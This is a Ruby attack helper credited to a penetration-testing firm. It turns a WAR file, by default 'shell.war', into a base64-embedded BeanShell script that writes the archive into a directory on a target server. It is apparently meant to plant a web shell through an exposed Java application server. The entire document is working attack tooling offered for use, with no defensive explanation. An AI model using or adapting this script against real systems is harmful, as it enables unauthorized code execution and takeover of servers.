#!/usr/bin/env ruby

######################################
#                                    #
#  RedTeam Pentesting GmbH           #
#  kontakt@redteam-pentesting.de     #
#  http://www.redteam-pentesting.de  #
#                                    #
######################################

require 'base64'
require 'optparse'

def parseopts(args)
  options = {
    :war => "shell.war",
    :out => "",
    :dir => "/tmp/",
    :newlines => false
  }
  OptionParser.new do |opts|
    opts.on("-w", "--warfile FILE", "WAR file to add (default: #{options[:war]})") do |f|
      options[:war] = f
    end
    opts.on("-o", "--output-file FILE", "Output to file FILE instead of stdout)") do |f|
      options[:out] = f
    end
    opts.on("-n", "--newlines", "Keep the newlines in the generated script") do
      options[:newlines] = true
    end
    opts.on("-d", "--dir DIR", "Directory the WAR file should be written to (default: #{options[:dir]}") do |dir|
      # Escaping Windows backslashes
      dir.gsub! /\\/, "\\\\\\\\"
      options[:dir] = dir
    end
    opts.on_tail("-h", "--help", "Show this help") do
      puts opts
      exit
    end
  end.parse!
  options
end

def mk_shellfile(options)
  war = File.open(options[:war], "r").read()
  war_b64 = Base64.encode64(war)

  bsh = <<EOT
import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

String val = "#{war_b64}";

BASE64Decoder decoder = new BASE64Decoder();
byte[] byteval = decoder.decodeBuffer(val);
FileOutputStream fstream = new FileOutputStream("#{options[:dir]}#{options[:war]}");
fstream.write(byteval);
fstream.close();
EOT

  unless options[:newlines]
    bsh.gsub!(/\n/, '')
  end

  if options[:out].empty?
    puts bsh
  else
    File.open(options[:out], "w") do |f|
      f.write(bsh)
    end
  end
end

if $0 == __FILE__
  options = parseopts(ARGV)
  mk_shellfile(options)
end
